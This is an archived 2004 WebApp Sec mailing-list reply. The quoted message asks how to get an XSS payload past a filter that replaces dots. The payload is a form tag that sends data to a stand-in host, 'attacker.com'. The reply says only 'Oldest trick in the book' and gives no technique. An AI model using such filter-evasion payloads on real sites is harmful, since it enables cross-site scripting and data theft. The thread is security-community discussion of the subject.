Home page logo

webappsec logo WebApp Sec mailing list archives

Re: Fullstop Substitution in XSS
From: Joseph Birr-Pixton <me () ifihada com>
Date: Tue, 01 Jun 2004 13:44:13 +0100

Calum Power wrote:

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.


Oldest trick in the book :)

Joseph Birr-Pixton

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]